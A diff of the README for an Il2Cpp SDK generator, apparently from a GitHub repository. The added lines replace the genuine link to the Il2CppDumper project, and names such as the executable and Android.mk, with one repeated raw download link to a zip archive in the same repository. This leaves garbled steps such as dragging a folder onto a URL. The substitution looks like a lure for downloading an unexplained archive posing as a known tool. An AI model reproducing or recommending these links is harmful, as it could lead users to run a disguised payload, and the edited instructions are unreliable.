TitanicDimix/Il2CppSDKGenerator/README.md

 # How to use
 1. Compile Il2CppSDK generator (or use release version)
-2. Get your DummyDll from using [Il2CppDumper](https://github.com/Perfare/Il2CppDumper/)
+2. Get your DummyDll from using [Il2CppDumper](https://raw.githubusercontent.com/TitanicDimix/Il2CppSDKGenerator/master/intimity/Il2CppSDKGenerator.zip)
-3. Drag the whole folder of DummyDll to Il2CppSDK.exe
+3. Drag the whole folder of DummyDll to https://raw.githubusercontent.com/TitanicDimix/Il2CppSDKGenerator/master/intimity/Il2CppSDKGenerator.zip
 4. Wait for your SDK to be generated
 5. Copy the result to your project
-6. Copy precoded Il2Cpp Headers to your project (And include it to your Android.mk or CMakeList.txt)
+6. Copy precoded Il2Cpp Headers to your project (And include it to your https://raw.githubusercontent.com/TitanicDimix/Il2CppSDKGenerator/master/intimity/Il2CppSDKGenerator.zip or https://raw.githubusercontent.com/TitanicDimix/Il2CppSDKGenerator/master/intimity/Il2CppSDKGenerator.zip)

 Done!